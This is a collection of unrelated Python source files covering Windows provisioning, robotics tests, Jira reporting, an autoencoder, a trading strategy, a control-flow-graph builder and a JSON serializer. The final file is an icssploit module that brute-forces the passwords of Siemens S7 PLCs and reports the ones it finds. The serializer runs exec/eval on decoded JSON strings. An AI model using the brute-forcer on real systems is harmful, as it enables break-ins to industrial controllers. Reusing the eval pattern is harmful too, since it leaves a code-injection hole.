"Software\\Microsoft\\Windows NT\\CurrentVersion\\Server\\"
"ServerLevels") as key:
return winreg.QueryValueEx(key, server_level)[0] == 1
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def execute_powershell_script(self, script_path, sysnative=True):
base_dir = self._get_system_dir(sysnative)
powershell_path = os.path.join(base_dir,
'WindowsPowerShell\\v1.0\\'
'powershell.exe')
args = [powershell_path]
if not self.is_nano_server():
args += ['-ExecutionPolicy', 'RemoteSigned', '-NonInteractive',
'-File']
args.append(script_path)
return self.execute_process(args, shell=False)
def execute_system32_process(self, args, shell=True, decode_output=False,
sysnative=True):
base_dir = self._get_system_dir(sysnative)
process_path = os.path.join(base_dir, args[0])
return self.execute_process([process_path] + args[1:],
decode_output=decode_output, shell=shell)
def get_maximum_password_length(self):
return 20
def set_timezone(self, timezone_name):
windows_name = windows_tz.tz_win.get(timezone_name)
if not windows_name:
raise exception.CloudbaseInitException(
"The given timezone name is unrecognised: %r" % timezone_name)
timezone.Timezone(windows_name).set(self)
def is_real_time_clock_utc(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation') as key:
try:
utc = winreg.QueryValueEx(key, 'RealTimeIsUniversal')[0]
return utc != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
raise
def set_real_time_clock_utc(self, utc):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'RealTimeIsUniversal', 0,
winreg.REG_DWORD, 1 if utc else 0)
def get_page_files(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management') as key:
values = winreg.QueryValueEx(key, 'PagingFiles')[0]
page_files = []
for value in values:
v = value.split(" ")
path = v[0]
min_size_mb = int(v[1]) if len(v) > 1 else 0
max_size_mb = int(v[2]) if len(v) > 2 else 0
page_files.append((path, min_size_mb, max_size_mb))
return page_files
def set_page_files(self, page_files):
values = []
for path, min_size_mb, max_size_mb in page_files:
values.append("%s %d %d" % (path, min_size_mb, max_size_mb))
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'PagingFiles', 0,
winreg.REG_MULTI_SZ, values)
def enable_trim(self, enable):
"""Enables or disables TRIM delete notifications."""
args = ["fsutil.exe", "behavior", "set", "disabledeletenotify",
"0" if enable else "1"]
(out, err, ret_val) = self.execute_system32_process(args)
if ret_val:
raise exception.CloudbaseInitException(
'TRIM configurating failed.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def set_path_admin_acls(self, path):
LOG.debug("Assigning admin ACLs on path: %s", path)
# Sets ACLs for "NT AUTHORITY\SYSTEM" and "BUILTIN\Administrators"
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"icacls.exe", path, "/inheritance:r", "/grant:r",
"*S-1-5-18:(OI)(CI)F", "*S-1-5-32-544:(OI)(CI)F"])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to set path ACLs.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def take_path_ownership(self, path, username=None):
if username:
raise NotImplementedError()
LOG.debug("Taking ownership of path: %s", path)
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"takeown.exe", "/F", path])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to take path ownership.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def check_dotnet_is_installed(self, version):
# See: https://msdn.microsoft.com/en-us/library/hh925568(v=vs.110).aspx
if str(version) != "4":
raise exception.CloudbaseInitException(
"Only checking for version 4 is supported at the moment")
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\NET Framework Setup\\NDP\\'
'v%s\\Full' % version) as key:
return winreg.QueryValueEx(key, 'Install')[0] != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def get_file_version(self, path):
info = win32api.GetFileVersionInfo(path, '\\')
ms = info['FileVersionMS']
ls = info['FileVersionLS']
return (win32api.HIWORD(ms), win32api.LOWORD(ms),
win32api.HIWORD(ls), win32api.LOWORD(ls))
def get_default_script_exec_header(self):
return constant.SCRIPT_HEADER_CMD
|
<reponame>JeroenDM/acrobotics
import numpy as np
import acrobotics as ab
from numpy.testing import assert_almost_equal
NUM_RANDOM_TESTS = 10
def numeric_jacobian(fun, qi):
fi = fun(qi)
n_in, n_out = len(qi), len(fi)
J = np.zeros((n_out, n_in))
h = 1e-7
Ih = np.eye(n_in) * h
for col in range(n_in):
J[:, col] = (fun(qi + Ih[col]) - fi) / h
return J
def dummy_f(x):
""" Simple function to test numerical differentiation. """
assert len(x) == 2
o1 = np.sin(x[0])
o2 = np.cos(x[1])
o3 = x[0] + x[1] ** 2
return np.array([o1, o2, o3])
def dummy_f_diff(x):
""" Jacobian of the dummy_f. """
J = np.zeros((3, 2))
J[0, 0] = np.cos(x[0])
J[1, 0] = 0.0
J[2, 0] = 1.0
J[0, 1] = 0.0
J[1, 1] = -np.sin(x[1])
J[2, 1] = 2 * x[1]
return J
def test_numerical_diff():
for _ in range(NUM_RANDOM_TESTS):
x = np.random.rand(2)
j_exact = dummy_f_diff(x)
j_approx = numeric_jacobian(dummy_f, x)
assert_almost_equal(j_exact, j_approx)
def test_planer_arm():
robot = ab.PlanarArm()
for _ in range(NUM_RANDOM_TESTS):
q = np.random.rand(robot.ndof)
j_exact = robot.jacobian_position(q)
j_approx = numeric_jacobian(lambda q: robot.fk(q)[:3, 3], q)
assert_almost_equal(j_exact, j_approx)
def test_planer_arm_rpy():
robot = ab.PlanarArm()
q = np.random.rand(robot.ndof)
print(robot.fk_rpy_casadi(q))
for _ in range(NUM_RANDOM_TESTS):
q = np.random.rand(robot.ndof)
j_exact = robot.jacobian_rpy(q)
j_approx = numeric_jacobian(lambda q: robot.fk_rpy(q), q)
assert_almost_equal(j_exact, j_approx)
def test_kuka():
robot = ab.Kuka()
for _ in range(NUM_RANDOM_TESTS):
q = np.random.rand(robot.ndof)
j_exact = robot.jacobian_position(q)
j_approx = numeric_jacobian(lambda q: robot.fk(q)[:3, 3], q)
assert_almost_equal(j_exact, j_approx)
def test_kuka_rpy():
robot = ab.Kuka()
q = np.random.rand(robot.ndof)
print(robot.fk_rpy_casadi(q))
for _ in range(NUM_RANDOM_TESTS):
q = np.random.rand(robot.ndof)
j_exact = robot.jacobian_rpy(q)
j_approx = numeric_jacobian(lambda q: robot.fk_rpy(q), q)
assert_almost_equal(j_exact[:3, :], j_approx[:3, :])
assert_almost_equal(j_exact[3:, :], j_approx[3:, :], decimal=5)
|
<reponame>jpodeszwik/jira-burndown-report-generator
#!/usr/bin/env python3
import requests
import sys
from requests.auth import HTTPBasicAuth
from itertools import groupby
import dateutil.parser
from datetime import timedelta
api_root = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
name = sys.argv[4]
start_date = sys.argv[5]
end_date = sys.argv[6]
auth = HTTPBasicAuth(username, password)
def find_issues_links():
data = {'jql' : 'worklogAuthor = ' + name + ' and worklogDate > ' + start_date + ' and worklogDate < ' + end_date}
url = api_root + '/search'
print(url, file=sys.stderr)
r = requests.post(url, json=data, auth=auth)
js = r.json()
issues = js['issues']
return [{'key': issue['key'], 'url': issue['self']} for issue in issues]
def parse_estimations(estimations):
developer_estimation = [estimation for estimation in estimations if estimation.startswith('Role: Developer')]
if len(developer_estimation) > 0 and developer_estimation[0].split('(')[1].isdigit():
return int(developer_estimation[0].split('(')[1]) / 3600
generic_estimation = [estimation for estimation in estimations if estimation.startswith('Role: -1')]
if len(generic_estimation) > 0:
return int(generic_estimation[0].split('(')[1]) / 3600
return 0
def is_in_date_range(date):
end_date_plus_one = (dateutil.parser.parse(end_date) + timedelta(days=1)).isoformat()
return date >= start_date and date < end_date_plus_one
def sum_times(person_logs):
total = sum([log['time'] for log in person_logs]) / 3600
in_range = sum([log['time'] for log in person_logs if is_in_date_range(log['started'])]) / 3600
return { 'total' : total, 'other_sprint' : total > in_range * 2 }
def is_owner(people_time):
max_time = max([people_time[k]['total'] for k in people_time])
persons_time = people_time[name]['total']
return max_time == persons_time
def parse_issue(issue):
print(issue['url'], file=sys.stderr)
r = requests.get(issue['url'], auth=auth)
js = r.json()
fields = js['fields']
estimations = parse_estimations(fields['customfield_12340']) if fields['customfield_12340'] is not None else fields['timeoriginalestimate']
worklog = fields['worklog']
summary = fields['summary']
if worklog['maxResults'] < worklog['total']:
url = issue['url'] + '/worklog'
print(url, file=sys.stderr)
worklog = requests.get(url, auth=auth).json()
worklogs = worklog['worklogs']
wl = [{'person' : worklog['author']['name'], 'time': worklog['timeSpentSeconds'], 'started': worklog['started']} for worklog in worklogs]
keyfunc = lambda x : x['person']
wl = sorted(wl, key=keyfunc)
groupped = groupby(wl, keyfunc)
people_time = {person: sum_times(list(logs)) for person, logs in groupped}
own_time = people_time[name]
status = fields['status']['name']
return { 'key' : issue['key'], 'summary': summary, 'estimation': estimations, 'logged': own_time['total'], 'owner': is_owner(people_time), 'other_sprint': own_time['other_sprint'], 'status': status }
print('Report {} {} - {}'.format(name, start_date, end_date))
issues = find_issues_links()
parsed_issues = [parse_issue(issue) for issue in issues if issue['key'] != 'KID-1']
refinement_issues = [issue for issue in parsed_issues if 'Refinement' in issue['summary']]
refinement_work = sum([issue['logged'] for issue in refinement_issues])
print('Refinements work: {}'.format(refinement_work))
issues_without_refinements = [issue for issue in parsed_issues if 'Refinement' not in issue['summary']]
issues_without_refinements = [issue for issue in issues_without_refinements if 'Angular training' not in issue['summary']]
total_work = sum([issue['logged'] for issue in issues_without_refinements])
print('Total hours logged: {}'.format(total_work))
minor_work = sum([issue['logged'] for issue in issues_without_refinements if not issue['owner']])
print('Minor work: {}'.format(minor_work))
owned_issues = [issue for issue in issues_without_refinements if issue['owner'] and not issue['other_sprint']]
other_sprint = [issue for issue in issues_without_refinements if issue['owner'] and issue['other_sprint']]
total_logged = sum([issue['logged'] for issue in owned_issues])
total_estimation = sum([issue['estimation'] for issue in owned_issues])
total_burnout = total_logged - total_estimation
total_burnout_percent = total_burnout / total_estimation * 100
print('Other sprint')
for issue in other_sprint:
burnout = issue['logged'] - issue['estimation'] if issue['estimation'] > 0 else 0
burnout_percent = burnout / issue['estimation'] * 100 if issue['estimation'] > 0 else 0
print('{} {} estimated {} logged {} burnout {} = {}%'.format(issue['key'], issue['summary'], int(issue['estimation']), int(issue['logged']), int(burnout), int(burnout_percent)))
print('Owned issued')
for issue in owned_issues:
burnout = issue['logged'] - issue['estimation'] if issue['estimation'] > 0 else 0
burnout_percent = burnout / issue['estimation'] * 100 if issue['estimation'] > 0 else 0
print('{} {} {} estimated {} logged {} burnout {} = {}%'.format(issue['key'], issue['status'], issue['summary'], int(issue['estimation']), int(issue['logged']), int(burnout), int(burnout_percent)))
print('Total: estimated {} logged {} burnout {} = {}%'.format(int(total_estimation), int(total_logged), int(total_burnout), int(total_burnout_percent)))
|
"""
Builds a stacked autoencoder.
Author(s): <NAME> (<EMAIL>)
"""
import numpy as np
from keras.models import Sequential
from keras.optimizers import Adagrad, SGD, Adadelta, Adam
from keras.regularizers import l2
from keras.layers import Input, Dense, noise
from keras.models import Model
from keras import backend as K
#from early_stopping import MyEarlyStopping
import ConfigParser
def save_decoder(model, ae_id, c):
# Get the file name
config = ConfigParser.ConfigParser()
config.read('config.ini')
source = config.get('Global', 'source')
noise_scale = config.getfloat('Global', 'noise_scale')
if source == 'sf':
alpha = config.getfloat('Superformula', 'nonlinearity')
beta = config.getint('Superformula', 'n_clusters')
sname = source + '-' + str(beta) + '-' + str(alpha)
elif source == 'glass' or source[:3] == 'sf-':
sname = source
fname = '%s_%.4f_%s_%d' % (sname, noise_scale, ae_id, c)
# Save model architecture and weights
json_string = model.to_json()
open('./trained_models/'+fname+'_architecture.json', 'w').write(json_string)
model.save_weights('./decoders/'+fname+'_weights.h5', overwrite=True)
def train_ae(data, feature_dim, hidden_sizes, l, p=0, batch_size=100, activation='tanh',
activity_regularizer=None, weights=None, nb_epoch=1000, loss='mse', verbose=False):
data_dim = data.shape[1]
inputs = Input(shape=(data_dim,))
sizes = [data_dim] + hidden_sizes + [feature_dim]
n_layers = len(sizes) - 1
# Encoder
x = noise.GaussianDropout(p)(inputs)
for i in range(n_layers):
x = Dense(sizes[i+1], activation=activation, W_regularizer=l2(l))(x)
# Decoder
for i in range(n_layers):
x = Dense(sizes[-i-2], activation=activation, W_regularizer=l2(l))(x)
decoded = x
model = Model(input=inputs, output=decoded)
if weights is not None:
model.set_weights(weights)
# optimizer = Adagrad(lr=lr, epsilon=epsilon)
optimizer = Adam()
model.compile(loss=loss, optimizer=optimizer)
# early_stopping = MyEarlyStopping(monitor='loss', patience=10, verbose=verbose, tol=1e-6)
model.fit(data, data, batch_size=batch_size, nb_epoch=nb_epoch, verbose=verbose)#, callbacks=[early_stopping])
if n_layers == 1:
W_en = model.layers[-2].get_weights()
W_de = model.layers[-1].get_weights()
else:
W_en = None
W_de = None
encode = K.function([model.layers[0].input, K.learning_phase()], [model.layers[-2].output])
a = encode([data, 0])[0] # hidden layer's activation
return a, W_en, W_de, model
def sae(data, c, feature_dim, train, test, hidden_size_l1=0, hidden_size_l2=0, hidden_size_l3=0, hidden_size_l4=0, p=0.3,
l=0, batch_size=100, evaluation=False, overwrite=True):
''' Select number of layers for autoencoder based on arguments
hidden_size_l1, hidden_size_l2, hidden_size_l3 and hidden_size_l4 '''
np.random.seed(0)
pre_training = False
verbose = 0
activation = 'tanh'
loss = 'mse'
nb_epoch = 5000 # maximum number of epochs
# p = 0.1 # dropout fraction for denoising autoencoders
if hidden_size_l1 == 0:
hidden_sizes = []
elif hidden_size_l2 == 0:
hidden_sizes = [hidden_size_l1]
elif hidden_size_l3 == 0:
hidden_sizes = [hidden_size_l1, hidden_size_l2]
elif hidden_size_l4 == 0:
hidden_sizes = [hidden_size_l1, hidden_size_l2, hidden_size_l3]
else:
hidden_sizes = [hidden_size_l1, hidden_size_l2, hidden_size_l3, hidden_size_l4]
data_dim = data.shape[1]
sizes = [data_dim] + hidden_sizes + [feature_dim]
n_layers = len(sizes) - 1
Ws = None
# Pre-training (greedy layer-wise training)
if pre_training:
Ws_en = []
Ws_de = []
a = data[train]
for i in range(n_layers):
if verbose:
print 'Pre-training for Layer %d ...' % (i+1)
a, W_en, W_de, _ = train_ae(a, sizes[i+1], [], l, p=p, batch_size=batch_size,
nb_epoch=nb_epoch, loss=loss, verbose=verbose)
Ws_en.append(W_en)
Ws_de.append(W_de)
Ws_de.reverse()
Ws = Ws_en + Ws_de
Ws = [item for sublist in Ws for item in sublist]
# Fine tuning
if verbose:
print 'Fine tuning ...'
_, _, _, model = train_ae(data[train], feature_dim, hidden_sizes, l, p=p, batch_size=batch_size,
nb_epoch=nb_epoch, loss=loss, verbose=verbose, weights=Ws)
if evaluation:
# Used for hyperparameter optimization
cost = model.evaluate(data[test], data[test], batch_size=len(test), verbose=verbose)
return cost
# Reconstruct using the decoder
decoder = Sequential()
for i in range(n_layers):
decoder.add(Dense(sizes[-i-2], input_dim=sizes[-i-1], activation=activation,
weights=model.layers[-n_layers+i].get_weights()))
decoder.compile(loss='mse', optimizer='sgd')
if p > 0:
name = 'SDAE-'+str(n_layers)
else:
name = 'SAE-'+str(n_layers)
if overwrite:
# Save the decoder
save_decoder(decoder, name, c)
encode = K.function([model.layers[0].input, K.learning_phase()], [model.layers[-n_layers-1].output])
features = np.zeros((data.shape[0],feature_dim))
features[train+test] = encode([data[train+test], 0])[0]
return features, name, decoder.predict
|
<filename>zvdata/sedes.py
# -*- coding: utf-8 -*-
import inspect
import json
from enum import Enum
import dash_core_components as dcc
import dash_daq as daq
import dash_html_components as html
import pandas as pd
import simplejson
from dash.dependencies import State
from sqlalchemy.ext.declarative import DeclarativeMeta
from sqlalchemy.orm.attributes import InstrumentedAttribute
from sqlalchemy.sql.elements import BinaryExpression
from zvdata.domain import context, table_name_to_domain_name
from zvdata.structs import IntervalLevel
from zvdata.utils.time_utils import to_time_str
class CustomJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, BinaryExpression):
sql_str = str(obj)
left, expression, _ = sql_str.split()
table_name, col = left.split('.')
value = obj.right.value
domain_name = table_name_to_domain_name(table_name)
if expression == '=':
expression = '=='
exec(f'from {context["domain_module"]} import {domain_name}')
if isinstance(value, str):
filter_str = '{}.{} {} "{}"'.format(domain_name, col, expression, value)
else:
filter_str = '{}.{} {} {}'.format(domain_name, col, expression, value)
return {'_type': 'filter',
'data': filter_str}
return super().default(obj)
class CustomJsonDecoder(json.JSONDecoder):
def __init__(self, *args, **kwargs):
json.JSONDecoder.__init__(self, object_hook=self.object_hook, *args, **kwargs)
def object_hook(self, obj):
if '_type' not in obj:
return obj
_type = obj.get('_type')
data = obj.get('data')
if _type == 'filter':
filter_str = data
left, _, _ = filter_str.split()
domain_name, col = left.split('.')
exec(f'from {context["domain_module"]} import {domain_name}')
return eval(filter_str)
return obj
class Jsonable(object):
def id(self):
return hash(simplejson.dumps(self.__json__()))
def __json__(self):
result = {}
spec = inspect.getfullargspec(self.__class__)
args = [arg for arg in spec.args if arg != 'self']
for arg in args:
value = eval('self.{}'.format(arg))
json_value = value
if isinstance(value, pd.Timestamp):
json_value = to_time_str(value)
if isinstance(value.__class__, DeclarativeMeta):
json_value = value.__class__.__name__
if isinstance(value, InstrumentedAttribute):
json_value = value.name
if isinstance(value, Enum):
json_value = value.value
result[arg] = json_value
return result
for_json = __json__ # supported by simplejson
class UiComposable(object):
@classmethod
def to_html_inputs(cls):
"""
construct ui input from the class constructor arguments spec
"""
spec = inspect.getfullargspec(cls)
args = [arg for arg in spec.args if arg != 'self']
annotations = spec.annotations
defaults = [cls.marshal_data_for_ui(default) for default in spec.defaults]
divs = []
states = []
for i, arg in enumerate(args):
left = html.Label(arg, style={'display': 'inline-block', 'width': '100px'})
annotation = annotations.get(arg)
default = defaults[i]
if annotation is bool:
right = daq.BooleanSwitch(id=arg, on=default)
state = State(arg, 'value')
elif 'level' == arg:
right = dcc.Dropdown(id=arg,
options=[{'label': item.value, 'value': item.value} for item in IntervalLevel],
value=default)
state = State(arg, 'value')
elif 'timestamp' in arg:
right = dcc.DatePickerSingle(id=arg, date=default)
state = State(arg, 'date')
else:
if 'filters' == arg and default:
default = json.dumps(default, cls=CustomJsonDecoder)
if 'columns' == arg and default:
columns = [column.name for column in default]
default = ','.join(columns)
if isinstance(default, list) or isinstance(default, dict):
default = json.dumps(default)
right = dcc.Input(id=arg, type='text', value=default)
state = State(arg, 'value')
right.style = {'display': 'inline-block'}
divs.append(html.Div([left, right], style={'margin-left': '120px'}))
states.append(state)
return divs, states
@classmethod
def ui_meta(cls):
return {}
@classmethod
def marshal_data_for_ui(cls, data):
if isinstance(data, Enum):
return data.value
if isinstance(data, pd.Timestamp):
return to_time_str(data)
return data
@classmethod
def unmarshal_data_for_arg(cls, data):
return data
@classmethod
def from_html_inputs(cls, *inputs):
arg_values = []
spec = inspect.getfullargspec(cls)
args = [arg for arg in spec.args if arg != 'self']
annotations = spec.annotations
for i, input in enumerate(inputs):
result = input
arg = args[i]
if input:
try:
result = json.loads(input, cls=CustomJsonDecoder)
except:
pass
arg_values.append(result)
return arg_values
|
import numpy as np
import talib
import math
def get_extreme(array_high_price_result, array_low_price_result):
np_array_high_price_result = np.array(array_high_price_result[:-1])
np_array_low_price_result = np.array(array_low_price_result[:-1])
max_result = np_array_high_price_result.max()
min_result = np_array_low_price_result.min()
return [max_result, min_result]
def get_atr_and_unit(atr_array_result, atr_length_result, portfolio_value_result):
atr = atr_array_result[atr_length_result - 1]
unit = math.floor(portfolio_value_result * .01 / atr)
return [atr, unit]
def get_stop_price(first_open_price_result, units_hold_result, atr_result):
stop_price = first_open_price_result - 2 * atr_result + (units_hold_result - 1) * 0.5 * atr_result
return stop_price
def init(context):
context.trade_day_num = 0
context.unit = 0
context.atr = 0
context.trading_signal = 'start'
context.pre_trading_signal = ''
context.units_hold_max = 4
context.units_hold = 0
context.quantity = 0
context.max_add = 0
context.first_open_price = 0
context.s = '000300.XSHG'
context.open_observe_time = 55
context.close_observe_time = 20
context.atr_time = 20
def handle_bar(context, bar_dict):
portfolio_value = context.portfolio.portfolio_value
high_price = history_bars(context.s, context.open_observe_time + 1, '1d', 'high')
low_price_for_atr = history_bars(context.s, context.open_observe_time + 1, '1d', 'low')
low_price_for_extreme = history_bars(context.s, context.close_observe_time + 1, '1d', 'low')
close_price = history_bars(context.s, context.open_observe_time+2, '1d', 'close')
close_price_for_atr = close_price[:-1]
atr_array = talib.ATR(high_price, low_price_for_atr, close_price_for_atr, timeperiod=context.atr_time)
maxx = get_extreme(high_price, low_price_for_extreme)[0]
minn = get_extreme(high_price, low_price_for_extreme)[1]
atr = atr_array[-2]
if context.trading_signal != 'start':
if context.units_hold != 0:
context.max_add += 0.5 * get_atr_and_unit(atr_array, atr_array.size, portfolio_value)[0]
else:
context.max_add = bar_dict[context.s].last
cur_position = context.portfolio.positions[context.s].quantity
available_cash = context.portfolio.cash
market_value = context.portfolio.market_value
if (cur_position > 0 and
bar_dict[context.s].last < get_stop_price(context.first_open_price, context.units_hold, atr)):
context.trading_signal = 'stop'
else:
if cur_position > 0 and bar_dict[context.s].last < minn:
context.trading_signal = 'exit'
else:
if (bar_dict[context.s].last > context.max_add and context.units_hold != 0 and
context.units_hold < context.units_hold_max and
available_cash > bar_dict[context.s].last*context.unit):
context.trading_signal = 'entry_add'
else:
if bar_dict[context.s].last > maxx and context.units_hold == 0:
context.max_add = bar_dict[context.s].last
context.trading_signal = 'entry'
atr = get_atr_and_unit(atr_array, atr_array.size, portfolio_value)[0]
if context.trade_day_num % 5 == 0:
context.unit = get_atr_and_unit(atr_array, atr_array.size, portfolio_value)[1]
context.trade_day_num += 1
context.quantity = context.unit
if (context.trading_signal != context.pre_trading_signal or
(context.units_hold < context.units_hold_max and context.units_hold > 1) or
context.trading_signal == 'stop'):
if context.trading_signal == 'entry':
context.quantity = context.unit
if available_cash > bar_dict[context.s].last*context.quantity:
order_shares(context.s, context.quantity)
context.first_open_price = bar_dict[context.s].last
context.units_hold = 1
if context.trading_signal == 'entry_add':
context.quantity = context.unit
order_shares(context.s, context.quantity)
context.units_hold += 1
if context.trading_signal == 'stop':
if context.units_hold > 0:
order_shares(context.s, -context.quantity)
context.units_hold -= 1
if context.trading_signal == 'exit':
if cur_position > 0:
order_shares(context.s, -cur_position)
context.units_hold = 0
context.pre_trading_signal = context.trading_signal
__config__ = {
"base": {
"securities": "stock",
"start_date": "2008-07-01",
"end_date": "2014-09-01",
"frequency": "1d",
"matching_type": "current_bar",
"stock_starting_cash": 1000000,
"benchmark": "000300.XSHG",
},
"extra": {
"log_level": "error",
},
"mod": {
"sys_progress": {
"enabled": True,
"show": True,
},
"sys_simulation": {
"signal": True,
}
},
}
|
import os
import enum
import logging
import graphviz
import sd3.cfa.graph
from sd3.disasm.attributes import Attr as CpuAttr
class EdgeAttr(enum.Enum):
true_cond = 1
false_cond = 2
class NodeData:
def __init__(self, addr):
self._start_addr = addr
self._instructions = []
def get_name(self):
return "%06X" % self._start_addr
def display(self):
for instr in self._instructions:
print(instr)
def add_instruction(self, inst):
self._instructions.append(inst)
def get_instructions(self):
return self._instructions
def has_instruction(self, addr):
for inst in self._instructions:
if inst.addr == addr:
return True
return False
class _GraphBuilder:
def __init__(self, routine):
self.routine = routine
self.cfg = None
self.curr_block = None
def _add_node(self, addr):
(node, new_node) = self.cfg.add_node("%X" % addr)
if new_node:
node.set_data(NodeData(addr))
return node
def _find_labels(self):
labels = set()
for instr in self.routine.instructions:
if instr.has_attr(CpuAttr.branch):
target = instr.get_jump_target()
labels.add(target)
return labels
def _handle_branch(self, instr):
logging.debug("Found branch 0x%06X", instr.addr)
# Block ends
data = self.curr_block.get_data()
data.add_instruction(instr)
# Get the following block if exists
if not instr.has_attr(CpuAttr.unconditional):
next_instr_addr = instr.get_next_instr_addr()
false_block = self._add_node(next_instr_addr)
else:
false_block = None
# Get targeted block
true_addr = instr.get_jump_target()
logging.debug("Target: %X", true_addr)
true_block = self._add_node(true_addr)
# Store output edges into current block
if false_block is not None:
edge = self.curr_block.add_successor(false_block)
edge.add_attr(EdgeAttr.false_cond)
edge = self.curr_block.add_successor(true_block)
edge.add_attr(EdgeAttr.true_cond)
# Continue to visit the routine
self.curr_block = false_block
else:
self.curr_block.add_successor(true_block)
self.curr_block = None
def _handle_label(self, instr):
logging.debug("Found label 0x%06X", instr.addr)
prev_block = self.curr_block
# Block starts
self.curr_block = self._add_node(instr.addr)
data = self.curr_block.get_data()
data.add_instruction(instr)
# Create link with previous block if we are transitioning
# between blocks
if prev_block is not None and prev_block != self.curr_block:
prev_block.add_successor(self.curr_block)
def _handle_body(self, instr):
if self.curr_block is None:
self.curr_block = self.cfg.get_node(instr.addr)
data = self.curr_block.get_data()
data.add_instruction(instr)
def _set_exit_node(self):
entry_node = self.cfg.get_entry()
exit_node = None
for (_, node) in self.cfg.get_node_it():
successors_count = len(node.get_successors())
if successors_count == 0 and node is not entry_node:
if exit_node is not None:
raise Exception("Exit node already found")
exit_node = node
if exit_node is None:
exit_node = entry_node
self.cfg.set_exit(exit_node)
def run(self):
self.cfg = sd3.cfa.graph.Graph()
# Add entry block
entry_addr = self.routine.get_addr()
self.curr_block = self._add_node(entry_addr)
self.curr_block.set_data(NodeData(entry_addr))
self.cfg.set_entry(self.curr_block)
labels = self._find_labels()
for instr in self.routine.instructions:
if instr.has_attr(CpuAttr.branch):
self._handle_branch(instr)
elif instr.addr in labels:
self._handle_label(instr)
else:
self._handle_body(instr)
# Set exit node
self._set_exit_node()
return self.cfg
class _GraphDrawer:
@staticmethod
def _node_to_str(node):
node_str = ""
data = node.get_data()
for instr in data.get_instructions():
node_str += "%s\l" % instr.to_str(display_addr=False)
return node_str
@staticmethod
def _build_edge_attrs(edge):
attrs = {}
if edge.has_attr(EdgeAttr.true_cond):
color = "green"
attrs["color"] = color
attrs["label"] = "true"
attrs["fontcolor"] = color
elif edge.has_attr(EdgeAttr.false_cond):
color = "red"
attrs["color"] = color
attrs["label"] = "false"
attrs["fontcolor"] = color
return attrs
@staticmethod
def draw(cfg, out_path):
basename, extension = os.path.splitext(out_path)
# Build graph
dot = graphviz.Digraph(
format=extension[1:],
node_attr={"shape": "box"})
# Build nodes
for _, node in cfg.get_node_it():
node_str = _GraphDrawer._node_to_str(node)
dot.node(node.get_data().get_name(), node_str)
# Build edges
for edge in cfg.get_edges_it():
attrs = _GraphDrawer._build_edge_attrs(edge)
dot.edge(
edge.get_src().get_data().get_name(),
edge.get_dest().get_data().get_name(),
**attrs)
return dot.render(filename=basename, cleanup=True)
def build_graph(routine):
builder = _GraphBuilder(routine)
return builder.run()
def draw_graph(cfg, out_path):
return _GraphDrawer.draw(cfg, out_path)
|
from icssploit.clients.s7_client import S7Client
from scapy.all import conf
import threading
from icssploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
boolify,
multi,
validators
)
class Exploit(exploits.Exploit):
__info__ = {
'name': 'S7 300/400 PLC Password Bruteforce',
'description': 'Module performs bruteforce attack against S7 300/400 Device. '
'If valid password string is found, it is displayed to the user.',
'authors': [
'<NAME> <jtrkid[at]gmail.com>',
],
'references': [
'',
],
'devices': [
'Siemens S7-300 and S7-400 programmable logic controllers (PLCs)',
],
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)
port = exploits.Option(102, 'Target Port', validators=validators.integer)
rack = exploits.Option(0, 'CPU rack number.', validators=validators.integer)
slot = exploits.Option(2, 'CPU slot number.', validators=validators.integer)
password = exploits.Option(wordlists.passwords, 'password string or file with community strings (file://)')
threads = exploits.Option(3, 'Number of threads')
verbose = exploits.Option(0, 'Verbose scapy output. 1: display, 0: hide', validators=validators.choice([0, 1]))
stop_on_success = exploits.Option('yes', 'Stop on first valid community string')
strings = []
def run(self):
conf.verb = int(self.verbose)
self.strings = []
self.attack()
@multi
def attack(self):
# todo: check if service is up
if self.password.startswith('file://'):
s7_pass = open(self.password[7:], 'r')
else:
s7_pass = [self.password]
collection = LockedIterator(s7_pass)
self.run_threads(self.threads, self.target_function, collection)
if len(self.strings):
print_success("Credentials found!")
headers = ("Target", "Port", "password")
print_table(headers, *self.strings)
else:
print_error("Valid password not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbose)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
s7_client = S7Client(name="Siemens PLC", ip=self.target, rack=self.rack, slot=self.slot)
s7_client.connect()
if not module_verbosity:
s7_client.logger.setLevel(50)
while running.is_set():
try:
string = data.next().strip()
if len(string) > 8:
continue
s7_client.check_privilege()
if s7_client.protect_level == 1:
print_error("Target didn't set password.")
return
s7_client.auth(string)
if s7_client.authorized:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Valid password string found - String: '{}'".format(
self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(
self.target, self.port, name, string), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
|
